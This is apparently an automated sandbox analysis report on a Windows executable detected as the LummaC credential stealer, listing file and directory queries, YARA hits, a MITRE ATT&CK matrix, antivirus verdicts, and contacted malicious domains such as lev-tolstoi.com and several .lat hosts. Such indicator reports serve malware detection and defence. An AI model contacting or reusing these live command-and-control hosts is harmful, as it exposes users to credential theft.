            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: Yara matchFile source: 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SPFFah2O2q.exe PID: 768, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: SPFFah2O2q.exe PID: 768, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		1
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		1
            Query Registry            		Remote Services1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory11
            Security Software Discovery            		Remote Desktop Protocol41
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager1
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares2
            Clipboard Data            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
            Obfuscated Files or Information            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput Capture114
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
            Software Packing            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials22
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SPFFah2O2q.exe42%VirustotalBrowse
            SPFFah2O2q.exe50%ReversingLabsWin32.Trojan.CrypterX
            SPFFah2O2q.exe100%AviraHEUR/AGEN.1306956
            SPFFah2O2q.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://lev-tolstoi.com/CDaU100%Avira URL Cloudmalware
            https://lev-tolstoi.com/Conte100%Avira URL Cloudmalware
            https://lev-tolstoi.com/;;100%Avira URL Cloudmalware
            https://lev-tolstoi.com/m/r100%Avira URL Cloudmalware
            https://lev-tolstoi.com/apiC100%Avira URL Cloudmalware
            https://store.steamp0%Avira URL Cloudsafe
            https://help.steampowered.co100%Avira URL Cloudmalware
            https://cdn.fastly.steamstatic.c0%Avira URL Cloudsafe
            https://lev-tolstoi.com/https:100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            steamcommunity.com
            		23.55.153.106
            		truefalse
              		high
              lev-tolstoi.com
              		172.67.157.254
              		truefalse
                		high
                sustainskelet.lat
                		unknown
                		unknownfalse
                  		high
                  crosshuaht.lat
                  		unknown
                  		unknownfalse
                    		high
                    rapeflowwj.lat
                    		unknown
                    		unknownfalse
                      		high
                      aspecteirs.lat
                      		unknown
                      		unknownfalse
                        		high
                        grannyejh.lat
                        		unknown
                        		unknownfalse
                          		high
                          discokeyus.lat
                          		unknown
                          		unknownfalse
                            		high
                            energyaffai.lat
                            		unknown
                            		unknownfalse
                              		high
                              necklacebudi.lat
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                aspecteirs.latfalse
                                  		high
                                  sustainskelet.latfalse
                                    		high
                                    rapeflowwj.latfalse
                                      		high
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        		high
                                        energyaffai.latfalse
                                          		high
                                          https://lev-tolstoi.com/apifalse
                                            		high
                                            grannyejh.latfalse
                                              		high
                                              necklacebudi.latfalse
                                                		high
                                                crosshuaht.latfalse
                                                  		high
                                                  discokeyus.latfalse
                                                    		high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/chrome_newtabSPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://steamcommunity.com/?subsection=broadcastsSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://store.steampowered.com/subscriber_agreement/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.valvesoftware.com/legal.htmSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://lev-tolstoi.com/CDaUSPFFah2O2q.exe, 00000000.00000003.1613523066.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1585634513.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583828888.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583861132.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1612693637.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1723469776.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1584113176.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613191723.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613811549.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1584143316.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583702027.0000000002EF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://lev-tolstoi.com/m/rSPFFah2O2q.exe, 00000000.00000003.1509926082.000000000050D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englSPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://s.ytimg.com;SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://store.steampSPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://lev-tolstoi.com/dSPFFah2O2q.exe, 00000000.00000003.1533066550.000000000050D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://lev-tolstoi.com/SPFFah2O2q.exe, 00000000.00000003.1613523066.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533195787.0000000000527000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1612693637.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1723469776.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000525000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613191723.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613811549.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://store.steampowered.com/privacy_agreement/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://store.steampowered.com/points/shop/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://ocsp.rootca1.amazontrust.com0:SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.ecosia.org/newtab/SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://lev-tolstoi.com/;;SPFFah2O2q.exe, 00000000.00000003.1509926082.000000000050D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              		unknown
                                                                                                              https://store.steampowered.com/privacy_agreement/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.google.com/recaptcha/SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://checkout.steampowered.com/SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://store.steampowered.com/about/SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://steamcommunity.com/my/wishlist/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://help.steampowered.com/en/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://steamcommunity.com/market/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://store.steampowered.com/news/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://store.steampowered.com/subscriber_agreement/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://steamcommunity.com/discussions/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://store.steampowered.com/stats/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/steam_refunds/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://lev-tolstoi.com/https:SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      		unknown
                                                                                                                                                      http://x1.c.lencr.org/0SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://x1.i.lencr.org/0SPFFah2O2q.exe, 00000000.00000003.1584367130.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/workshop/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://login.steampowered.com/SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.allSPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cSPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://store.steampowered.com/legal/SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
